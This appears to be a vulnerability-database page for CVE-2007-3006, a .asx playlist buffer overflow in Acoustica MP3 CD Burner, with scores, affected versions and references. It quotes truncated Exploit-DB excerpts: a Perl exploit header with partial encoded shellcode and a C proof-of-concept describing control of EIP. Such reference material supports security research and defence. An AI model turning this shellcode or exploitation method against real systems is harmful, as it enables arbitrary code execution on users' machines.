CVE-2007-3006
Published 2007-06-04
Priority P4 · 28 · medium · 6.8 CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 8.09% (94.1th percentile)
Buffer overflow in Acoustica MP3 CD Burner 4.32 allows user-assisted remote attackers to execute arbitrary code via a .asx playlist file with a REF element containing a long string in the HREF attribute. NOTE: it was later claimed that 4.51 Build 147 is also affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| acoustica | acoustica_mp3_cd_burner | — | — |
No detection rules found.
Exploit-DB
Acoustica MP3 CD Burner 4.51 Build 147 - '.asx' Local Buffer Overflow
exploitdb·2008-08-29

```perl
#!/usr/bin/perl
#
# Acoustica MP3 CD Burner (asx file) Local BOF Exploit
# Author: Koshi
#
# Date: 08-29-08 ( 0day )
# Application: Acoustica MP3 CD Burner
# Version: 4.51 Build 147 ( possibly older )
# Site: http://acoustica.com/download.htm
# Tested On: Windows XP SP3 Fully Patched
#
# Based off of n00b's findings http://www.milw0rm.com/exploits/4017
# gr33tz: Rima my baby, str0ke, n00b ( nice find )
# win32_exec - EXITFUNC=process CMD=calc.exe Size=338 Encoder=Alpha2 http://metasploit.com
my $shellcode =
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49".
"\x49\x49\x49\x49\x48\x49\x49\x49\x49\x49\x49\x49\x51\x5a\x6a\x66".
"\x58\x50\x30\x42\x31\x41\x42\x6b\x42\x41\x76\x42\x32\x42\x41\x32".
"\x41
```

Exploit-DB
Acoustica MP3 CD Burner 4.32 - Local Buffer Overflow (PoC)
exploitdb·2007-05-31

```c
/*
Credits to n00b for finding this bug and poc..
Acoustica MP3 CD Burner 4.32 local buffer-overflow poc code.
Date : May 31st 2007
Tested: On win xp sp 2.
Acoustica is prone to a buffer-overflow when parsing a .asx playlist file.
If you can entice someone to open a specially crafted .asx play list file it
is possible to run shell-code. This issue occurs because the applications fail
to properly check boundaries on user-supplied data before copying it to an
insufficiently sized memory buffer. If we open it up in olly and pass the
specially crafted .asx we will see at first we can control the eax registers
also ecx gets overwritten if we pass exception the eip is overwritten.
I will try and write a local exploit in a few da
```

No writeups or analysis indexed.
- http://osvdb.org/43455
- http://secunia.com/advisories/31666
- http://www.securityfocus.com/bid/24247
- https://exchange.xforce.ibmcloud.com/vulnerabilities/34647
- https://www.exploit-db.com/exploits/4017
- https://www.exploit-db.com/exploits/6329